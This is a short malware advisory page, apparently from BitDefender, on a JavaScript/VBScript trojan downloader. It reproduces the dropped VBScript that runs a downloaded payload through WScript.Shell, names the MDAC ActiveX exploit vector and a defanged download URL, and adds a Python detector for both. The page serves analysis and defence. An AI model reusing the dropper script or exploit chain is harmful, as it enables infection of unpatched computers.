
Trojan.Downloader.JS.Psyme.SR


First posted on 21 November 2011.
Source: BitDefender

Aliases:

Trojan.Downloader.JS.Psyme.SR is also known as Exploit.JS.ActiveX.r, Exploit:JS/Mult.AC, Virus, found, JS/Downloader.Agent, Downloader, VBS/TrojanDownloader.Psyme.NFJ.

Explanation:

The Trojan uses obfuscated VBScript code and JavaScript to download other malware onto the user's computer.
It is part of a "drive-by exploit chain" which uses known security flaws to infect computers that are not updated. It tries to use a vulnerable Microsoft Data Access Components (MDAC) ActiveX object through its CLSID (BD96C556-65A3-11D0-983A-00C04FC29E36). You can find more here (MS06-014).

Using the mentioned exploit it downloads a file from hxxp://?.weixk.com/new/a1.css, which is detected as Rootkit.Agent.AIWN, into the %Temp% folder with the name "GameeeEeee.pif". Afterward it generates another VBScript file which has the following content:

'I LOVE gameee TEAM'I LOVE gameee TEAM
Set Love_gameee = CreateObject("Wscript.Shell")'I LOVE gameee TEAM
'I LOVE gomeee TEAM'i LOVE gomeee TEAM
Love_gameee.run ("%Temp%GameeeEeee.pif")
'I LOVE gameee TEAM'I LOVE gameee TEAM

This is done in order to execute the first downloaded file through the generated VBScript using a "shell" object.
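As an added example (not part of the BitDefender write-up), the checks a defender could run over captured web content and dropped scripts for this chain: one matches the MS06-014 MDAC CLSID named above in HTML or JavaScript, the other strips the junk apostrophe comments the dropped VBScript is padded with and recovers the WScript.Shell variable and the command it runs. The sample VBScript is the one quoted above; everything else is assumed for the example.

```python
import re

# CLSID of the MDAC RDS.DataSpace ActiveX object named on the page (MS06-014),
# matched with or without the "clsid:" prefix and surrounding braces.
MDAC_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"
CLSID_RE = re.compile(r"(?:clsid:)?\{?" + re.escape(MDAC_CLSID) + r"\}?", re.IGNORECASE)
SHELL_RE = re.compile(r'Set\s+(\w+)\s*=\s*CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.IGNORECASE)

# The dropped VBScript quoted on the page, used here as sample input.
DROPPED_VBS = """'I LOVE gameee TEAM'I LOVE gameee TEAM
Set Love_gameee = CreateObject("Wscript.Shell")'I LOVE gameee TEAM
'I LOVE gomeee TEAM'i LOVE gomeee TEAM
Love_gameee.run ("%Temp%GameeeEeee.pif")
'I LOVE gameee TEAM'I LOVE gameee TEAM
"""

def strip_vbs_comments(script: str) -> str:
    """Remove apostrophe comments; apostrophes inside double-quoted strings are kept."""
    kept_lines = []
    for line in script.splitlines():
        in_str, kept = False, []
        for ch in line:
            if ch == '"':
                in_str = not in_str
            elif ch == "'" and not in_str:
                break  # rest of the line is a comment
            kept.append(ch)
        kept_lines.append("".join(kept).rstrip())
    return "\n".join(l for l in kept_lines if l)

def references_mdac_clsid(content: str) -> bool:
    """True if web content (HTML/JS) references the MS06-014 MDAC CLSID."""
    return CLSID_RE.search(content) is not None

def find_shell_run(script: str):
    """Return (variable, command) when a WScript.Shell object is created and .run is called on it."""
    code = strip_vbs_comments(script)
    created = SHELL_RE.search(code)
    if not created:
        return None
    var = created.group(1)
    run = re.search(re.escape(var) + r'\.run\s*\(?\s*"([^"]*)"', code, re.IGNORECASE)
    return (var, run.group(1)) if run else None
```

Because the comment stripper is applied first, the padding comments (including the one glued to the end of the Set line) do not hide the CreateObject call from the pattern match.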

Last update 21 November 2011
